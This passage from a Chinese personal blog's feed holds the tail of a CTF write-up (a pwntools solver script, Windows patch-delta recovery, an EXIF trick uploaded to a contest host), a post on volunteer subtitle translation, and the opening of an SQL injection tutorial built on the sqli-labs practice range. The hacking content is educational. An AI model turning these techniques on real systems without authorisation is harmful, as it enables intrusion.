class="keyword">def</span> <span class="title function_">eval_image</span>():</span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">        p.recvuntil(<span class="string">b'Is this picture real or not (Y/N)? \n'</span>)</span><br><span class="line">        b64_image = p.recvuntil(<span class="string">b'\n'</span>, drop=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">for</span> filename <span class="keyword">in</span> os.listdir(<span class="string">'images_model'</span>):</span><br><span class="line">            <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">f'images_model/<span class="subst">{filename}</span>'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                <span class="keyword">if</span> base64.b64encode(f.read()).decode() == b64_image.decode():</span><br><span class="line">                    correct_answer = filename[-<span class="number">5</span>].upper()</span><br><span class="line">                    file_list.append(filename)</span><br><span class="line">                    <span class="keyword">if</span> correct_answer != <span class="string">'Y'</span> <span class="keyword">and</span> correct_answer != <span class="string">'N'</span>:</span><br><span class="line">                        correct_answer = <span class="string">'N'</span></span><br><span class="line">                    correct_answers.append(correct_answer)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    p.recvuntil(<span class="string">b" all 20 rounds (Y/N): "</span>)</span><br><span class="line">    data = <span class="string">''</span>.join(correct_answers)</span><br><span class="line">    info(data)</span><br><span class="line">    p.sendline(data.encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    correct_answers = []</span><br><span class="line">    file_list = []</span><br><span class="line">    p = remote(<span class="string">'instance.penguin.0ops.sjtu.cn'</span>, <span class="number">18081</span>)</span><br><span class="line">    p.send(<span class="string">b'CONNECT 6gmer7hwgjkkh6fc:1 HTTP/1.1\r\n\r\n'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b"solution + '"</span>)</span><br><span class="line">    challenge = p.recvuntil(<span class="string">b"'"</span>, drop=<span class="literal">True</span>).decode()</span><br><span class="line">    info(<span class="string">f"challenge: <span class="subst">{challenge}</span>"</span>)</span><br><span class="line">    <span class="comment"># p.interactive()</span></span><br><span class="line">    solution = solve_pow(challenge)</span><br><span class="line">    <span class="keyword">if</span> solution <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    info(<span class="string">f"solution: <span class="subst">{solution}</span>"</span>)</span><br><span class="line">    p.sendline(solution.encode())</span><br><span class="line">    eval_image()</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">len</span>(file_list))</span><br><span class="line">    response = p.recvline()</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'flag'</span> <span class="keyword">in</span> response:</span><br><span class="line">        <span class="built_in">print</span>(response)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    p.close()</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">flag{Revenge_1s_Ea5y_aNd_1ntere5t1ng!}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="f-and-r"><a href="#f-and-r" class="headerlink" title="f and r"></a>f and r</h3><p>本题考察的是信息检索能力和动手能力。</p>
<p>几乎全靠这篇文章：</p>
<p><a href="https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html">https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html</a></p>
<p>根据文章提到的步骤把msu里面的cab提取出来：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">mkdir content</span><br><span class="line">expand.exe <span class="operator">-F</span>:* <span class="string">".\windows10.0-kb114514-x64.msu"</span> ./content</span><br><span class="line"><span class="built_in">cd</span> content</span><br><span class="line">mkdir content</span><br><span class="line">expand.exe <span class="operator">-F</span>:* <span class="string">".\Windows10.0-KB114514-x64.cab"</span> ./content</span><br><span class="line"><span class="built_in">cd</span> content</span><br><span class="line">mkdir content</span><br><span class="line">expand.exe <span class="operator">-F</span>:* <span class="string">".\Windows10.0-KB114514-x64.cab"</span> ./content</span><br><span class="line"><span class="built_in">cd</span> content</span><br><span class="line">mkdir content</span><br><span class="line">expand.exe <span class="operator">-F</span>:* <span class="string">".\Cab_for_KB114514_PSFX.cab"</span> ./content</span><br></pre></td></tr></tbody></table></figure>

<p>发现f和r文件夹下都有curl.exe。那么我们要做的就是从delta和curl.exe恢复出一个二进制文件。</p>
<p>需要利用作者编写的delta_patch.py。但是直接将题目给的f和r喂进去是行不通的。</p>
<p>文中有这么一段：</p>
<blockquote>
<p>To generate the binaries I want I’m going to apply the reverse delta and then each forward delta, creating two output files:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">PS &gt; python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-07.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-07\x64\os-kernel_10.0.18362.959\f\ntoskrnl.exe</span><br><span class="line">Applied 2 patches successfully</span><br><span class="line">Final hash: zZC/JZ+y5ZLrqTvhRVNf1/79C4ZYwXgmZ+DZBMoq8ek=</span><br><span class="line">PS &gt; python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-08.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-08\x64\os-kernel_10.0.18362.1016\f\ntoskrnl.exe</span><br><span class="line">Applied 2 patches successfully</span><br><span class="line">Final hash: UZw7bE231NL2R0S4yBNT1nmDW8PQ83u9rjp91AiCrUQ=</span><br></pre></td></tr></tbody></table></figure>
</blockquote>
<p>何意呢，目测是说：</p>
<p>我们有一个比较新的文件，一个旧补丁，一个处于中间的补丁。利用旧补丁的r回到旧版本，再用中间补丁的f就可以生成中间版本。</p>
<p><code>update.mum</code>里面有一串网址：<code>https://support.macrohard.com/help/5034203</code></p>
<p>好好好把巨硬改成微软，发现是KB5034203更新，那就把这个msu下载下来，提取出其中curl的f和r。</p>
<p>然后用KB5034203的r回滚到旧版本，用题目给的f生成我们要的二进制文件。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">python delta_patch.py <span class="literal">-i</span> curl.exe <span class="literal">-o</span> curl.patched.exe .\kb5034203\r\curl.exe .\kb114514\amd64_curl_0o0o0o0o0o0o0o0_10.<span class="number">0.19041</span>.<span class="number">9999</span>_none_0o0o0o0o0o0o0o0\f\curl.exe</span><br><span class="line">.\curl.patched.exe <span class="literal">--version</span></span><br></pre></td></tr></tbody></table></figure>

<p>得到flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{ dc1d03c554150a cedca6d71ce394 }</span><br></pre></td></tr></tbody></table></figure>

<p>去掉空格即可。</p>
<h3 id="Boy’s-Bullet"><a href="#Boy’s-Bullet" class="headerlink" title="Boy’s Bullet"></a>Boy’s Bullet</h3><p>本题考查图片exif编辑能力和阅读理解能力。</p>
<p>回旋镖是吧。2000年出生的男孩24岁开枪38岁噶了，我作为一个2024年出生的照片也应该38岁时噶，所以应该是2062年。刚开始这个时间戳没搞明白啥意思，一开始文件名里带时间错，后来在图片里加时间戳，后来才猛地想起exif也有时间戳。</p>
<p>用这个<a href="https://thexifer.net/">网站</a>随便修改了一张图片的exif信息（Modify Date），然后上传：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">curl -T 2062.jpeg http://111.186.57.85:10038</span><br></pre></td></tr></tbody></table></figure>

<p>就能得到flag: </p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{47_7h15_m0m3n7_3duc4710n_h45_c0mp1373d_4_72u1y_c1053d_100p}</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://bu.dusays.com/2024/04/26/662b4a0a87f47.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b4a0a87f47.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="result"></p>
<p>没记flag，学校那个莫名连不上，换geekctf复现的。</p>
]]></content>
      <categories>
        <category>CTF</category>
      </categories>
      <tags>
        <tag>PWN</tag>
        <tag>Misc</tag>
        <tag>Reverse</tag>
        <tag>Web</tag>
      </tags>
  </entry>
  <entry>
    <title>记录第一次参与美漫翻译</title>
    <url>/posts/sp-translate/</url>
    <content><![CDATA[<p>有点小兴奋。我终于也成了一名”烤肉man”。以前看美剧、美漫的时候片头字幕组给我的感觉就是：帅爆了。试想一下，你将自己喜欢看的剧翻译成中文，你的同好看的某一集就是你翻译的——SO DAMN COOL!<span id="more"></span></p>
<h2 id="关于我看美漫这件事"><a href="#关于我看美漫这件事" class="headerlink" title="关于我看美漫这件事"></a>关于我看美漫这件事</h2><p>虽然我的头像是炭治郎，但其实我平时看日漫真不多，我近几年看过的日漫简直屈指可数：《鬼灭之刃》、《咒术回战》，《国王排名》甚至只看了一点点。倒是看美漫看得还比较多<del>，只不过没多少能拿来当头像的</del>。能拿到台面上来说的有：<em>Rick and Morty</em>, <em>Gravity Falls</em>, <em>Love,Death&amp;Robots</em>。剩下的就不多说了<del>，如果有美漫同好也可以私我</del>。反正对我来说，看日漫是因为热血，看美漫是因为脑洞。可能喜欢看美漫是因为它能让我从固化的思维当中暂时抽离出来吧！</p>
<h2 id="烤肉的起因"><a href="#烤肉的起因" class="headerlink" title="烤肉的起因"></a>烤肉的起因</h2><p>向看国外片子少的小伙伴们解释下，一般称没有翻译的外语片为生肉，有中文字幕的则叫做熟肉，而翻译过程就叫做烤肉。这件事的起因是我的一个好兄弟找到了这部动漫中文字幕组的账号，看到了他们发布的招新信息，他就加入了。后来他告诉我翻译工作频率很低、随缘，而且翻译测试很简单，我就跟着冲了。（果然easy，毕竟招新要求是初三以上即可 XD）</p>
<h2 id="烤肉的经过"><a href="#烤肉的经过" class="headerlink" title="烤肉的经过"></a>烤肉的经过</h2><p>严格来说，我做的并不能算烤肉的工作。这部动漫联手育碧等公司发布了三款游戏：真理之杖、完整破碎、手机毁灭者（看过动漫或者玩过游戏的小伙伴想必已经知道我说的是哪部动漫了，我翻译的是游戏演示视频，但我已经很满意了。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e777d23930.png" data-fancybox="default" data-caption="聊天记录"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e777d23930.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e777d23930.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="聊天记录"></a><span class="image-caption">聊天记录</span></div></div>
<p>很多加群的新人都会问这样一个问题：“有ddl吗？”他们都会得到相同的有些意外的答案：“没有”。因为所有翻译全都是用爱发电、为爱发电。没有人会要求你完成多少翻译任务，没有人限定翻译时间；同样地，没有人会进群划水，也没有人领了任务迟迟不完成。另外，在烤肉的过程中，虽然有wiki可以参考，但是像这样一部梗满天飞的美漫仍旧是很难翻译的。有些梗可能十分冷门，因此翻译难度很大，但是没有谁会摆烂瞎翻。之前群里有一段关于某一缩写的含义的讨论，持续了好几天才得出结论。</p>
<h2 id="一些感受"><a href="#一些感受" class="headerlink" title="一些感受"></a>一些感受</h2><p>加入翻译组不仅让我结识了一群该动漫的同好，也让我的翻译能力有了大幅度的提升。毕竟在大学里我的英语全靠高中的功底强撑着，我是不太可能主动学习英语的。但是我的确喜欢翻译，这是一种将地道的外国表达转换成够味儿的中文表达的过程，是多元文化的碰撞。当然，毋宁说是这让我理解更多梗、让我有一种平日里少有的自豪感。</p>
<p>其实这样的翻译工作跟博客创作倒是有些相似之处：一群同好聚集在一起做喜欢的事，充满热情和活力，一起讨论问题、解决问题、分享。当然，还有为爱发电。我认识的绝大多数博主创作博客的目的都不是为了盈利，毕竟做博客的盈利或许都很难比得上维护博客所耗费的时间、精力、财力。对了，对我来说这两个圈子还有一个共同点：那就是比我现在大学生活的圈子精彩得多。</p>
<p>最后放一张我翻译的片段吧！</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7790ddd7a.png" data-fancybox="default" data-caption="image-20220706210344922"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7790ddd7a.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7790ddd7a.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image-20220706210344922"></a><span class="image-caption">image-20220706210344922</span></div></div>
<p>这是我第一次烤肉，因此很多表达翻译成中文自己都感觉怪怪的，希望能继续进步吧！<del>还想参与下半年电影字幕的翻译呢嘿嘿</del></p>
]]></content>
      <categories>
        <category>生活</category>
      </categories>
      <tags>
        <tag>杂七杂八</tag>
      </tags>
  </entry>
  <entry>
    <title>SQL注入新手教程（一）——sqli-labs靶场搭建</title>
    <url>/posts/sqli1/</url>
    <content><![CDATA[<h2 id="网站环境搭建"><a href="#网站环境搭建" class="headerlink" title="网站环境搭建"></a>网站环境搭建</h2><p>首先我们要搭建一个（本地）网站环境，如果对搭建网站不是很熟悉的小伙伴们可以使用XAMPP或者PHPstudy来搭建。<span id="more"></span>这两个软件集成了搭建网站所需要用到的PHP、Apache、MySQL等软件。如果自己用其他方式搭建的话要注意sqli-labs是不支持PHP7的，因为之前版本的一些要用到的函数在PHP7中被删除了。我用的是5.6.9版本。<br>这里我就用PHPstudy为例（听名字就知道使用起来更简单）:</p>
<p>首先确保没有安装过PHP，Apache或MySQL</p>
<p>前往官网下载PHPstudy：<a href="https://www.xp.cn/">https://www.xp.cn/</a></p>
<p>下载完成后安装，打开面板。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e77dba39b0.png" data-fancybox="one" data-caption="1-1"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e77dba39b0.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e77dba39b0.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="1-1"></a><span class="image-caption">1-1</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e77ea12aea.jpg" data-fancybox="one" data-caption="1-2"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e77ea12aea.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e77ea12aea.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="1-2"></a><span class="image-caption">1-2</span></div></div>
<p>如图示操作，第一次打开应该点击更多版本，找到php5.6.9或者更低的版本安装。并将php版本切换成你安装的那个版本。接下来回到首页，按图操作：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e77f472d45.png" data-fancybox="one" data-caption="1-3"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e77f472d45.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e77f472d45.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="1-3"></a><span class="image-caption">1-3</span></div></div>
<p>将WAMP、Apache和MySQL启动，其他的停止。这里可能会遇到端口被占用的情况导致某个套件无法启动。遇到这个问题可以去找占用了改端口的进程并将其停止。Windows用户可以参考这篇文章：<a href="https://www.runoob.com/w3cnote/windows-finds-port-usage.html">链接</a></p>
<p>如果上述过程都顺利完成，接下来在你的浏览器输入localhost或127.0.0.1就可以进入默认网页。这时就代表网站环境已经搭建成功了！<del>芜湖！</del></p>
<h2 id="sqli-labs下载与配置"><a href="#sqli-labs下载与配置" class="headerlink" title="sqli-labs下载与配置"></a>sqli-labs下载与配置</h2><p>sqli-labs在GitHub上开源，直接到仓库里下载zip文件：<a href="https://github.com/Audi-1/sqli-labs">https://github.com/Audi-1/sqli-labs</a></p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e77ff8b120.png" data-fancybox="one" data-caption="2-1"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e77ff8b120.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e77ff8b120.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-1"></a><span class="image-caption">2-1</span></div></div>
<p>下载完成后解压并复制到<code>phpstudy_pro\www\</code>目录下</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e780dba786.png" data-fancybox="one" data-caption="2-2"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e780dba786.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e780dba786.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-2"></a><span class="image-caption">2-2</span></div></div>
<p>我这里将解压好的文件夹重命名为<code>sqli</code>方便我之后打开。<br><strong>注意：要确保你复制过来的文件夹打开是下图这样，如果打开是一个同名的文件夹，你应该把图中内容剪切出来并删除这个同名的文件夹</strong></p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78194d219.png" data-fancybox="one" data-caption="2-3"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78194d219.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78194d219.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-3"></a><span class="image-caption">2-3</span></div></div>
<p>接着在<code>sql-connections</code>目录下找到<code>db-creds.inc</code>文件并打开修改</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7825ea589.png" data-fancybox="one" data-caption="2-4"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7825ea589.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7825ea589.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-4"></a><span class="image-caption">2-4</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78319f417.png" data-fancybox="one" data-caption="2-5"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78319f417.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78319f417.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-5"></a><span class="image-caption">2-5</span></div></div>
<p>使用PHPstudy的话，用户名密码默认都是root，都修改为root即可。要是不喜欢的话可以打开PHPstudy面板点击数据库，按照相应提示修改密码就可以了。<strong>但一定要确保MySQL数据库的用户名密码和该配置中一致！！！</strong></p>
<p>接下来在浏览器中输入<code>localhost/sqli/</code>，这里<code>sqli</code>要换成你在Github上下载的那个文件夹解压后改的名字。（可以补充一下，这里搭建的网站其实就是www根目录下的所有文件和目录的集合。在后面加一个sqli/其实就是进入了sqli这个文件夹，然后进这个文件夹默认显示的就是这个文件夹里面的index.html或者index.php）</p>
<p>言归正传，打开后显示如图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7842a771d.png" data-fancybox="one" data-caption="2-6"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7842a771d.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7842a771d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-6"></a><span class="image-caption">2-6</span></div></div>
<p>点击<code>setup/reset Database for labs</code>进行sqli-labs的初始化，初始化成功的页面如图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7853ecfff.png" data-fancybox="one" data-caption="2-7"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7853ecfff.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7853ecfff.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2-7"></a><span class="image-caption">2-7</span></div></div>
<p>如果看到这个页面，congratulations！sqli-labs靶场环境已经搭建成功了。接下来只要点击page1/2/3/4就可以去完成挑战了！</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>还是要强调，不要在不被授权的网站上练习MySQL。<br>下一期（很快555）我们学习基于报错的的注入，也就是less1-less6。</p>
]]></content>
      <categories>
        <category>Web安全</category>
      </categories>
      <tags>
        <tag>SQL注入</tag>
      </tags>
  </entry>
  <entry>
    <title>SQL注入新手教程（二）——基于报错的注入</title>
    <url>/posts/sqli2/</url>
    <content><![CDATA[<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>在学习本期内容之前，先介绍本期用到的基础知识。<span id="more"></span></p>
<ul>
<li><p>表</p>
<ul>
<li>行：又称为记录或数据</li>
<li>列：一般称为字段</li>
</ul>
</li>
<li><p>常用语句</p>
<ul>
<li>select<br>用法：select 字段1,字段2,字段3…… from 表名 （where 筛选条件）<br>翻译一下就是如果满足某条件，从某表选择某字段展示出来（所有行）</li>
<li>limit<br>用法：加在上述语句后面，如limit 0,1。表示限制显示的行数<br>第一个参数表示起始行（0开始计数），第二个参数表示显示的行数。这一句就代表显示第0行。limit 2,3就是显示第2行到第4行</li>
<li>order by<br>用法：order by 字段名或字段序号<br>比如一张表users有三个字段（列），分别是id,username,passwd，你可以用select username from users order by id或者 by 1来这些记录按照id排序。默认升序，要降序可以order by 1 desc。也就是加一个descending的缩写。</li>
<li><strong>union（重要）</strong><br>用法：select 字段1,字段2,字段3 from 表1 union select 字段1,字段2,字段3 from 表2<br>用来将两条查询语句的查询结果拼接起来显示。<br>注意：两条语句查找的字段数要一致。可以想象两张表如果是有不同列数是不能拼接起来的。</li>
</ul>
</li>
<li><p>常用字符</p>
<ul>
<li>逻辑运算符<br>and 与；or 或；not 非。</li>
<li>单行注释<br><code>#</code>或<code>--</code></li>
<li>加号，连接（在URL中等同于空格）<br><code>+</code></li>
<li>通配符<ul>
<li>*通配符的作用是匹配所有结果集。<br>比如select * from users就是将users整张表展示出来</li>
<li>%通配符的作用是替代0个或多个字符，用在like中<br>相当于正则表达式里的*。比如select username from users where username like “a%min”。则可能匹配到username为amin,admin,aemin,addddddmin……这样的记录（如果有）</li>
<li>_通配符的作用是替代1个字符，用在like中<br>比如select username from users where username like “a_min”。则可能匹配到admin,aemin,afmin……这样的记录（如果有）</li>
</ul>
</li>
</ul>
</li>
<li><p>数据库指纹<br>所谓数据库指纹，就是说我们可以根据报错信息来判断数据库类型</p>
<table>
<thead>
<tr>
<th>NO</th>
<th>报错</th>
<th>数据库类型</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>You have an error in your SQL syntax; check the manual that corresponds to your MySQL <br>server version for the right syntax to use near ”1” LIMIT 0,1′ at line 1</td>
<td>MySQL</td>
</tr>
<tr>
<td>2</td>
<td>ORA-00933: SQL command not properly ended</td>
<td>Oracle</td>
</tr>
<tr>
<td>3</td>
<td>Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string</td>
<td>MSSQL</td>
</tr>
</tbody></table>
</li>
<li><p>GET和POST传参<br>我们在上网的过程中，需要和服务器进行交互。比如我们在搜索引擎搜索一个词语，就是向服务器传递了一个参数。服务器通过这个参数从数据库中找到我们想要的内容，再展示给我们。这就是传参的基本原理了。</p>
<ul>
<li><p>GET传参<br>如果你比较细心，你或许会发现你在浏览网站时有的时候浏览器地址栏你的URL是以?xx=xx这样的方式结尾的，这其实就是GET传参。GET方式传参的最大特点就是请求传递的参数最终都会显式地拼接到URL后面。</p>
</li>
<li><p>POST传参<br>这种方式的传参不会显示在地址栏中，相对来说比较安全。输入密码这类敏感信息时通常会使用POST传参。</p>
</li>
</ul>
<p>想象我的博客有这样一个界面：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">username:</span><br><span class="line">password:</span><br></pre></td></tr></tbody></table></figure>

<p>需要你输入用户名和密码，你输入了zhangsan和123。如果我安全意识很低，做网站的时候给这个表单method属性设置为GET，那么你提交的时候地址栏可能就变成了<a href="https://bowenyoung.cf/?username=zhangsan&amp;password=123%E3%80%82%E5%A6%82%E6%9E%9C%E6%88%91%E6%AF%94%E8%BE%83%E8%B4%B4%E5%BF%83%EF%BC%8C%E6%88%91%E5%B0%B1%E4%BC%9A%E8%AE%BE%E7%BD%AE%E6%88%90POST%EF%BC%8C%E9%82%A3%E4%B9%88%E4%BD%A0%E8%BF%98%E6%98%AF%E6%8A%8A%E5%8F%82%E6%95%B0%E4%BC%A0%E7%BB%99%E4%BA%86%E6%88%91%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E4%BD%86%E6%98%AF%E5%9C%B0%E5%9D%80%E6%A0%8F%E4%B8%8A%E5%B0%B1%E7%9C%8B%E4%B8%8D%E5%88%B0%E4%BA%86~~%E4%BD%A0%E6%97%81%E8%BE%B9%E7%9A%84%E4%BA%BA%E4%B9%9F%E5%B0%B1%E6%B2%A1%E8%BF%99%E4%B9%88%E5%AE%B9%E6%98%93%E7%9C%8B%E5%88%B0%E4%BD%A0%E7%9A%84%E5%AF%86%E7%A0%81%E4%BA%86~~%E3%80%82">https://bowenyoung.cf/?username=zhangsan&amp;password=123。如果我比较贴心，我就会设置成POST，那么你还是把参数传给了我这个网站的服务器，但是地址栏上就看不到了~~你旁边的人也就没这么容易看到你的密码了~~。</a></p>
</li>
<li><p>网页URL编码<br>URL 只能使用 ASCII 字符集通过因特网进行发送。<br>由于 URL 通常包含 ASCII 集之外的字符，因此必须使用URL编码将 URL 转换为有效的 ASCII 格式。<br>URL编码也被用来防止SQL注入。<del>知己知彼，百战不殆<span class="github-emoji"><span>😜</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/1f61c.png?v8" class="lazyload" data-srcset="https://github.githubassets.com/images/icons/emoji/unicode/1f61c.png?v8" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span></del><br>可以参考W3School的这篇文章，还有编码转换工具：<a href="https://www.w3school.com.cn/tags/html_ref_urlencode.asp">链接</a></p>
</li>
</ul>
<h2 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h2><ul>
<li><p>Q:数据库后端如何执行查询操作？<br>想象我的博客有一个登录界面需要输入用户名和密码，当你输入用户名和密码后，后端就会产生   并执行一条查询（SQL查询），登录成功后该查询结果会被显示在我们的主页。例如:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">username: zhangsan</span><br><span class="line">password: 123</span><br></pre></td></tr></tbody></table></figure>

